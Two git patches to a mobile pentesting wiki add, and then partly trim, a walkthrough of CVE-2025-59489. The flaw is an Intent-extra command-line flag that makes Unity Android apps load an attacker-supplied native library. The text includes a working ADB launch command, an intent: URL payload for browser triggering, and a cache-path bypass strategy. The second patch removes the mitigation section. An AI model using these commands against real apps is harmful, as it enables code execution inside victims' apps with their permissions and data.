From 3991805cbe1d36a50c70ef9510e777318badf096 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 16 Oct 2025 13:19:25 +0000 Subject: [PATCH 1/2] Add content from: CVE-2025-59489: Arbitrary Code Execution in Unity Runtime --- .../intent-injection.md | 76 +++++++++++++++++++ src/mobile-pentesting/android-checklist.md | 7 +- 2 files changed, 82 insertions(+), 1 deletion(-) diff --git a/src/mobile-pentesting/android-app-pentesting/intent-injection.md b/src/mobile-pentesting/android-app-pentesting/intent-injection.md index 94e3d22878c..d5dd098fd7b 100644 --- a/src/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/src/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -53,6 +53,77 @@ Mitigations - Only enable JavaScript after all checks pass and just before loading trusted content. - Avoid exposing bridges to untrusted origins. +## Unity Runtime: Intent-to-CLI extras → pre-init native library injection (RCE) + +Unity-based Android apps typically use `com.unity3d.player.UnityPlayerActivity` (or `UnityPlayerGameActivity`) as the entry Activity. Unity’s Android template treats a special Intent extra named `unity` as a string of command-line flags for the Unity runtime. When the entry Activity is exported (default in many templates), any local app – and sometimes a website if `BROWSABLE` is present – can supply this extra. + +A dangerous, undocumented flag leads to native code execution during very early process initialization: + +- Hidden flag: `-xrsdk-pre-init-library ` +- Effect: `dlopen(, RTLD_NOW)` very early in init, loading attacker-controlled ELF inside the target app’s process with its UID and permissions. + +Reverse-engineering excerpt (simplified): +```c +// lookup the arg value +initLibPath = FUN_00272540(uVar5, "xrsdk-pre-init-library"); +// load arbitrary native library early +lVar2 = dlopen(initLibPath, 2); // RTLD_NOW +``` + +Why it works +- The Intent extra `unity` is parsed into Unity runtime flags. +- Supplying the pre-init flag points Unity at an attacker-controlled ELF path within an allowed linker namespace path (see constraints below). + +Conditions for exploitation +- The Unity entry Activity is exported (commonly true by default). +- For one-click remote via browser: the entry Activity also declares `android.intent.category.BROWSABLE` so extras can be passed from an `intent:` URL. + +Local exploitation (same device) +1) Place a payload ELF at a path readable by the victim app. Easiest: ship a malicious library in your own attacker app and ensure it is extracted under `/data/app/.../lib//` by setting in the attacker’s manifest: +```xml + +``` +2) Launch the victim’s Unity activity with the CLI pre-init flag in the `unity` extra. Example ADB PoC: +```bash +adb shell am start \ + -n com.victim.pkg/com.unity3d.player.UnityPlayerActivity \ + -e unity "-xrsdk-pre-init-library /data/app/~~ATTACKER_PKG==/lib/arm64/libpayload.so" +``` +3) Unity calls `dlopen("/data/.../libpayload.so", RTLD_NOW)`; your payload runs in the victim process, inheriting all its app permissions (camera/mic/network/storage, etc.) and access to in-app sessions/data. + +Notes +- The exact `/data/app/...` path varies across devices/installs. An attacker app can retrieve its own native lib dir at runtime via `getApplicationInfo().nativeLibraryDir` and communicate it to the trigger. +- The file need not end with `.so` if it is a valid ELF – `dlopen()` cares about ELF headers, not extensions. + +Remote one‑click via browser (conditional) +If the Unity entry activity is exported with `BROWSABLE`, a website can pass extras via an `intent:` URL: +```text +intent:#Intent;package=com.example.unitygame;scheme=whatever;\ +S.unity=-xrsdk-pre-init-library%20/data/local/tmp/malicious.so;end; +``` +However, on modern Android the dynamic linker namespaces and SELinux block loading from many public paths (e.g., `/sdcard/Download`). You’ll see errors like: +``` +library "/sdcard/Download/libtest.so" ("/storage/emulated/0/Download/libtest.so") needed +or dlopened by "/data/app/.../lib/arm64/libunity.so" is not accessible for the +namespace: [name="clns-...", ... permitted_paths="/data:/mnt/expand:/data/data/com.example.unitygame"] +``` +Bypass strategy: target apps that cache attacker-controlled bytes under their private storage (e.g., HTTP caches). Because permitted paths include `/data` and the app’s private dir, pointing `-xrsdk-pre-init-library` at an absolute path inside the app’s cache can satisfy linker constraints and yield code execution. This mirrors prior cache-to-ELF RCE patterns experienced in other Android apps. + +Hunting and triage +- Manifest indicators: exported `com.unity3d.player.UnityPlayerActivity` or `UnityPlayerGameActivity`; presence of `BROWSABLE` increases attack surface. +- Quick probe that the Intent-to-CLI bridge is active: +```bash +adb shell am start -n /com.unity3d.player.UnityPlayerActivity \ + -e unity "-systemallocator" +``` +- If the app starts without crashing, proceed to test the pre-init flag with a controlled path. + +Developer mitigations +- Update to Unity patched runtime versions (2019.1+ per vendor advisory) or apply Unity’s Binary Patch tool, rebuild and republish. +- Remove `BROWSABLE` from the entry activity unless strictly needed. +- Avoid exporting Unity entry activity or guard with a signature permission. +- Treat any Intent → CLI bridge as untrusted input; eliminate dangerous flags on release builds. + ## Other classic Intent injection primitives - startActivity/sendBroadcast using attacker-supplied `Intent` extras that are later re-parsed (`Intent.parseUri(...)`) and executed. @@ -203,6 +274,11 @@ Mitigations (developer checklist) ## References +- [CVE-2025-59489 – Arbitrary Code Execution in Unity Runtime (blog)](https://flatt.tech/research/posts/arbitrary-code-execution-in-unity-runtime/) +- [Unity docs – Android custom activity command-line](https://docs.unity3d.com/6000.0/Documentation/Manual/android-custom-activity-command-line.html) +- [Unity Security Sept-2025-01 advisory](https://unity.com/security/sept-2025-01) +- [HEXACON talk – Messenger one-click cache-based RCE pattern (slides)](https://www.hexacon.fr/slides/Calvanno-Defense_through_Offense_Building_a_1-click_Exploit_Targeting_Messenger_for_Android.pdf) + - [Android – Access to app-protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/) - [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26) - [Pwn2Own Ireland 2024 – Samsung S24 attack chain (whitepaper)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html) diff --git a/src/mobile-pentesting/android-checklist.md b/src/mobile-pentesting/android-checklist.md index 0b4da25ef1d..198e51e5355 100644 --- a/src/mobile-pentesting/android-checklist.md +++ b/src/mobile-pentesting/android-checklist.md @@ -29,6 +29,7 @@ - [ ] Check if the application is in debug mode and try to "exploit" it - [ ] Check if the APK allows backups - [ ] Exported Activities + - [ ] Unity Runtime: exported UnityPlayerActivity/UnityPlayerGameActivity with a `unity` CLI extras bridge. Test `-xrsdk-pre-init-library ` for pre-init `dlopen()` RCE. See [Intent Injection → Unity Runtime](android-app-pentesting/intent-injection.md). - [ ] Content Providers - [ ] Exposed services - [ ] Broadcast Receivers @@ -75,4 +76,8 @@ - [ ] [Read here](android-app-pentesting/index.html#obfuscating-deobfuscating-code) -{{#include ../banners/hacktricks-training.md}} +## References + +- [CVE-2025-59489 – Arbitrary Code Execution in Unity Runtime (blog)](https://flatt.tech/research/posts/arbitrary-code-execution-in-unity-runtime/) + +{{#include ../banners/hacktricks-training.md}} \ No newline at end of file From e7f850fdd9ce2fe822fb4f0c58ab807cfad00003 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sat, 25 Oct 2025 17:57:45 +0200 Subject: [PATCH 2/2] Update intent-injection.md --- .../intent-injection.md | 25 ++++--------------- 1 file changed, 5 insertions(+), 20 deletions(-) diff --git a/src/mobile-pentesting/android-app-pentesting/intent-injection.md b/src/mobile-pentesting/android-app-pentesting/intent-injection.md index d5dd098fd7b..5864ffa4044 100644 --- a/src/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/src/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -109,20 +109,6 @@ namespace: [name="clns-...", ... permitted_paths="/data:/mnt/expand:/data/data/c ``` Bypass strategy: target apps that cache attacker-controlled bytes under their private storage (e.g., HTTP caches). Because permitted paths include `/data` and the app’s private dir, pointing `-xrsdk-pre-init-library` at an absolute path inside the app’s cache can satisfy linker constraints and yield code execution. This mirrors prior cache-to-ELF RCE patterns experienced in other Android apps. -Hunting and triage -- Manifest indicators: exported `com.unity3d.player.UnityPlayerActivity` or `UnityPlayerGameActivity`; presence of `BROWSABLE` increases attack surface. -- Quick probe that the Intent-to-CLI bridge is active: -```bash -adb shell am start -n /com.unity3d.player.UnityPlayerActivity \ - -e unity "-systemallocator" -``` -- If the app starts without crashing, proceed to test the pre-init flag with a controlled path. - -Developer mitigations -- Update to Unity patched runtime versions (2019.1+ per vendor advisory) or apply Unity’s Binary Patch tool, rebuild and republish. -- Remove `BROWSABLE` from the entry activity unless strictly needed. -- Avoid exporting Unity entry activity or guard with a signature permission. -- Treat any Intent → CLI bridge as untrusted input; eliminate dangerous flags on release builds. ## Other classic Intent injection primitives @@ -274,11 +260,6 @@ Mitigations (developer checklist) ## References -- [CVE-2025-59489 – Arbitrary Code Execution in Unity Runtime (blog)](https://flatt.tech/research/posts/arbitrary-code-execution-in-unity-runtime/) -- [Unity docs – Android custom activity command-line](https://docs.unity3d.com/6000.0/Documentation/Manual/android-custom-activity-command-line.html) -- [Unity Security Sept-2025-01 advisory](https://unity.com/security/sept-2025-01) -- [HEXACON talk – Messenger one-click cache-based RCE pattern (slides)](https://www.hexacon.fr/slides/Calvanno-Defense_through_Offense_Building_a_1-click_Exploit_Targeting_Messenger_for_Android.pdf) - - [Android – Access to app-protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/) - [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26) - [Pwn2Own Ireland 2024 – Samsung S24 attack chain (whitepaper)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html) @@ -295,5 +276,9 @@ Mitigations (developer checklist) - [CVE-2022-36837 – CVE.org](https://www.cve.org/CVERecord?id=CVE-2022-36837) - [CVE-2021-4438 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-4438) - [CVE-2020-14116 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-14116) +- [CVE-2025-59489 – Arbitrary Code Execution in Unity Runtime (blog)](https://flatt.tech/research/posts/arbitrary-code-execution-in-unity-runtime/) +- [Unity docs – Android custom activity command-line](https://docs.unity3d.com/6000.0/Documentation/Manual/android-custom-activity-command-line.html) +- [Unity Security Sept-2025-01 advisory](https://unity.com/security/sept-2025-01) +- [HEXACON talk – Messenger one-click cache-based RCE pattern (slides)](https://www.hexacon.fr/slides/Calvanno-Defense_through_Offense_Building_a_1-click_Exploit_Targeting_Messenger_for_Android.pdf) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}}